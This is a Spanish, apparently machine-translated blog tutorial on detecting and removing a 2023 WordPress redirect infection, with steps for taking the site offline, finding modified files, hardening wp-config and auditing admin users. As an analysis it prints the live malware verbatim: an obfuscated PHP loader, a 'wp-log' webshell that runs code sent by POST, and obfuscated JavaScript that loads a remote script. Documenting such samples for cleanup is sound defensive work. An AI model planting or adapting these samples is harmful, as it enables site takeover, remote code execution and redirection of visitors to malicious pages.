Redirige WordPress Hack 2023

Redirige WordPress Hack 2023 (redirección del virus)

0

WordPress es definitivamente la plataforma más utilizada CMS (Content Management System) Tanto para blogs como para tiendas iniciales en línea (con el módulo WooCommerce), lo que lo convierte en los más dirigidos por los ataques informáticos (piratería). Una de las operaciones de piratería más utilizadas tiene como objetivo redirigir el sitio web comprometido a otras páginas web. Redirect WordPress Hack 2023 es un malware relativamente nuevo que impacta para redirigir todo el sitio a páginas web de spam o que a su vez virus de los usuarios de los usuarios.

Si su sitio desarrollado en WordPress se redirige en otro sitio, entonces la víctima ya es el famoso hack de redirección.

En este tutorial encontrará la información necesaria y los consejos útiles a través de los cuales puede descartar un sitio web infectado con redirección WordPress Hack (Virus Redirect). A través de los comentarios, puede obtener información adicional o solicitar ayuda.

Detección de virus que redirige los sitios de WordPress

La disminución repentina e injustificada en el tráfico en el sitio, la disminución del número de pedidos (en el caso de las tiendas en línea) o los recibos publicitarios son las primeras señales de que algo no está bien. Detección “Redirect WordPress Hack 2023” (Virus de redirección) se puede hacer y “visual” Al abrir el sitio web y se le redirige a otra página web.

Desde la experiencia, la mayoría de las aplicaciones de malware web son compatibles con los navegadores de Internet: Chrome, Firefox, Edge, Opera. Si es un usuario de la computadora Mac, estos virus no son muy visibles en el navegador Safari. El sistema de seguridad Safari bloquea tácitamente estos scripts maliciosos.

¿Qué debes hacer si tienes un sitio web de WordPress Hack Word Hack Virus?

Espero que la primera medida sea no entrar en pánico o eliminar el sitio web. Ni siquiera los archivos de virus o virus deben eliminarse en la primera fase. Contienen información valiosa que puede ayudarlo a comprender dónde está la violación de seguridad y qué ha afectado el virus. Modus operandi.

Cierre el sitio web para el público.

¿Cómo cierras un sitio web de virus para los visitantes? Lo más simple es usar el administrador de DNS y eliminar su IP para “A” (Nombre de dominio) o definir una IP inexistente. Por lo tanto, los visitantes del sitio web estarán protegidos de este truco de redireccionamiento de WordPress que puede llevarlos a páginas web de virus o spam.

Si usas CloudFlare Como administrador de DNS, se autentica en su cuenta y elimina los registros DNS “A” para el nombre de dominio. Por lo tanto, el área afectada por el virus permanecerá sin IP, no se puede acceder desde Internet.

Copie la IP del sitio web y haga “ruta” para poder acceder solo a ti. De tu computadora.

¿Cómo se cambia la IP real de un sitio web en las computadoras de Windows?

El método a menudo se usa para bloquear el acceso a ciertos sitios web editando el archivo “anfitriones”.

1. Abra el bloc de notas u otro editor de texto (con los derechos del administrador) y edite el archivo “hosts“. Se encuentra en: 

C:\Windows\System32\drivers\etc\hosts

2. En el archivo “anfitriones” agregar “ruta” a la IP real de su sitio web. IP eliminado arriba del administrador DNS. 

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Guarde el archivo y acceda al sitio web en el navegador.

Si el sitio web no se abre y no cometió un error en el archivo “anfitriones”Lo más probable es que sea un caché DNS.

Para eliminar el caché DNS en un sistema operativo de Windows, abra el símbolo del sistema, donde ejecuta el pedido: 

ipconfig /flushdns

¿Cómo se cambia la IP real de un sitio web en las computadoras Mac / MacBook?

Para los usuarios de computadoras de Mac, es un poco más fácil cambiar la IP real de un sitio web.

1. Abra la utilidad Terminal.

2. Realice la línea de comando (requiere la contraseña del sistema para la ejecución): 

sudo nano /etc/hosts

3. En cuanto a las computadoras de Windows, agregue la IP real del dominio. 

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Guarde los cambios. Ctrl+X (y).

Después de haber hecho “ruta”, usted es la única persona que puede acceder al sitio web de WordPress Hack Word Hack Virus.

Sitio web de respaldo completo – Archivos y base de datos

Incluso si es virus con “Redirigir WordPress Hack”, la recomendación es hacer una copia de seguridad general de todo el sitio web. Archivos y base de datos. Posiblemente podría guardar una copia local de ambos archivos en public / public_html así como la base de datos.

Identificación de virus y archivos modificados de redirigir WordPress Hack 2023

Los archivos de destino principales de WordPress Soy index.php (en la raíz), header.php, index.php y footer.php del tema activo de WordPress. Verifique manualmente estos archivos e identifique un código MalicID o un script de malware.

En 2023, un tipo de virus “Redirigir WordPress Hack” meter en index.php un código de formulario:

(¡No te recomiendo que ejecute estos códigos!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Decodificado, este script malware Es prácticamente la consecuencia del sitio web de WordPress. No es el script que es la base de la aplicación de malware, pero es el script que permite redirigir la página web del virus. Si decodificamos el script anterior, obtenemos: 

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>
FIJAR REDIGLE WORDPRESS HACK 2023
FIJAR REDIGLE WORDPRESS HACK 2023

Como para indicar todos los archivos en el servidor que contiene este código, es bueno tener acceso SSH al servidor para ejecutar los archivos de verificación y administración en Linux.

Relacionado: ¿Cómo encuentra si tiene un blog de virus o no, con la ayuda de Google Search? (Virus de WordPress)

A continuación hay dos comandos que ciertamente son útiles para identificar archivos y archivos modificados recientemente que contienen un código particular (cadena).

¿Cómo ve los archivos PHP modificados en las últimas 24 horas o en otro rango de tiempo en Linux?

Dominio “find” Es muy simple de usar y permite que la personalización establezca el período de tiempo, el parche en el que se realizan la búsqueda y el tipo de archivos. 

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

En la salida recibirá información sobre la fecha y hora en que se modificó el archivo, escribiendo / lectura / permisos de ejecución (chmod) y cuyo grupo / usuario pertenece.

Si desea verificar hace varios días, cambie el valor “-mtime -1” o usar “-mmin -360” por minutos (6 horas).

¿Cómo está buscando un código (cadena) dentro de los archivos PHP, Java?

Línea de comando “encontrar” a través del cual puede encontrar rápidamente todos los archivos PHP o Java que contienen un código en particular es el siguiente: 

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

El pedido buscará y mostrará archivos .php y .js que contiene “uJjBRODYsU“.

Con la ayuda de los dos pedidos anteriores, encontrará muy fácilmente qué archivos se han modificado últimamente y contienen código de malware.

Elimina el malware de los archivos modificados sin comprometer el código correcto. En mi escenario, el código de malware se colocó antes de la apertura <head>.

En la ejecución de la primera orden “encontrar” Es muy posible descubrir nuevos archivos en el servidor, que no son WordPress o se colocan allí. Archivos que proclaman el virus de redirección de WordPress Hack.

En el escenario investigado por mí, los archivos de formulario aparecieron en el servidor “wp-log-nOXdgD.php“. Estos son archivos “generación” que también contienen código de malware utilizado por el virus de redirección. 

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

Propósito del tipo de archivos “wp-log-*” Es para difundir el virus de redireccionamiento y otros sitios web alojados en el servidor. Es un tipo de código de malware “webshell” compuesto de uno sección básica (en el que se definen algunas variables encriptadas) y o sección de ejecución por el cual el atacante intenta cargar y ejecutar un código de malware en el sistema.

Si hay una variable POST llamado ‘bh‘ y su valor encriptado MD5 es igual a “8f1f964a4b4d8d1ac3f0386693d28d03“, entonces el script parece escribir el contenido encriptado base64 de otra variable llamada ‘b3‘ en un archivo temporal y luego intente incluir este archivo temporal.

Si hay una variable POST o GET llamado ‘tick'El script responderá con el valor MD5 de la cuerda “885“.

Para identificar todos los archivos en el servidor que contiene este código, elija una cadena que sea común, luego ejecute el comando de “find” (Similar a lo anterior). Eliminar todos los archivos que contienen este código de malware.

Infracción de seguridad operada por Redirect WordPress Hack

Lo más probable es que este virus de redirección llegue a través de Explotación del usuario de la administración de WordPress o identificando un complemento vulnerable que permite la adición de usuarios con privilegios de administrador.

Para la mayoría de los sitios web construidos en la plataforma WordPress es posible Edición de temas de temas o complementosa la interfaz de administración (Dashboard). Por lo tanto, una persona maliciosa puede agregar los archivos del malware del tema que genera los scripts presentados anteriormente.

Un ejemplo de tal malware es este: 

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript identificado en el encabezado del tema de WordPress, inmediatamente después de abrir la etiqueta <head>.

Es bastante difícil descifrar este JavaScript, pero es obvio que es más probable que otra dirección web traiga otros scripts para crear archivos “wp-log-*” sobre el cual hablé arriba.

Buscar y eliminar este código de todos los archivos PHP afectado.

Por lo que pude entender, este código era agregado manualmente por un nuevo usuario con privilegios administrativos.

Por lo tanto, para evitar la adición de malware en el tablero, es mejor deshabilitar el tablero de WordPress / Plugins en el tablero.

Editar el archivo wp-config.php y agregue las líneas: 

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

Después de hacer este cambio, ningún usuario de WordPress podrá editar archivos de tablero.

Verifique a los usuarios con el rol de administrador

A continuación se muestra una consulta SQL que puede usar para buscar a los usuarios con administrador en la plataforma de WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Esta consulta devolverá a todos los usuarios en la tabla wp_users quien atribuyó el papel de administrador. La consulta se realiza para la mesa wp_usermeta buscar en meta ‘wp_capabilities', Que contiene información sobre los roles de los usuarios.

Otro método es identificarlos de: Dashboard → Users → All Users → Administrator. Pero estoy practicando a un usuario se puede ocultar en el panel del tablero. Entonces la mejor manera de ver a los usuarios “Administrador” WordPress es el comando SQL anterior.

En mi caso, identifiqué en la base de datos al usuario con el nombre “wp-import-user“. Bastante sugerente.

WP Malware malo usuarios
WP Malware malo usuarios

Desde aquí puede ver la fecha y la hora cuando se creó el usuario de WordPress. El usuario del usuario también es muy importante porque estaba buscando en los registros del servidor. De esta manera, puede ver toda la actividad de este usuario.

Eliminar usuarios con el rol de administrador que no sabes, entonces Cambia tus contraseñas a todos los usuarios administrativos. Editor, autor, administrador.

Cambiar la contraseña del usuario de SQL a la base de datos del sitio web afectado.

Después de tomar estos pasos, el sitio web se puede reiniciar para todos los usuarios.

Sin embargo, tenga en cuenta que lo que presenté anteriormente es uno de los miles de astrones por el cual un sitio web es con el truco de WordPress redirigido en 2023.

Si su sitio web ha sido virus y necesita ayuda o si tiene alguna inquietud, el cuadro de comentarios está abierto.

Apasionado por la tecnología, escribo con placer en Stealthsetts.com a partir de 2006. Tengo una rica experiencia en sistemas operativos: macOS, Windows y Linux, pero también en lenguajes de programación y plataformas de blogs (WordPress) y para tiendas en línea (WooCommerce, Magento, Preshop).

Tutoriales escritos por mí.
Antivirus & Seguridad Linux Noticias tecnológicas Tutoriales y noticias de TI WordPress
Malware Virus WordPress Hacks de WordPress Virus de WordPress
Home Su fuente de tutoriales de TI, consejos útiles y noticias. Redirige WordPress Hack 2023 (redirección del virus)

¿Cómo puede bloquear automáticamente su computadora cuando se aleja de ella?

¿Cómo puedes desbloquear Mac con la ayuda de Apple Watch?

Deja un comentario

Configuración de sigilo

Windows

Windows 11

Windows 10

Windows 8 / 8.1

Windows 7

Windows Vista

Windows XP

Gerente de tareas

Como

Microsoft 365 / Office

Microsoft 365 / Office

Sobresalir

Palabra

PowerPoint

Perspectiva

Office 365 productividad

Linux & Software web

Nginx

Servidor apache http

Php

Sql / mysql

CentOS

Ubuntu

Alojamiento web

WordPress & WooCommerce

Seguridad & Antivirus

Conciencia

Muestra mi IP

Antivirus & Seguridad

Malware

Spyware

© 2025 Configuración de sigilo. Tutoriales y noticias en el campo de TI.

política de privacidad | Acerca de las galletas | Contacto | Sobre nosotros

RomânăEnglishFrançaisDeutschItalianoEspañolPortuguês日本語한국어Bahasa IndonesiaNorskNederlandsPolskiDanskSuomiSvenskaHrvatskiČeštinaБългарскиSlovenčinaSlovenščinaEesti keelLatviešu valodaLietuvių kalbaΕλληνικάУкраїнська中文(简体)РусскийTürkçeTiếng Việtעבריתภาษาไทยالعربية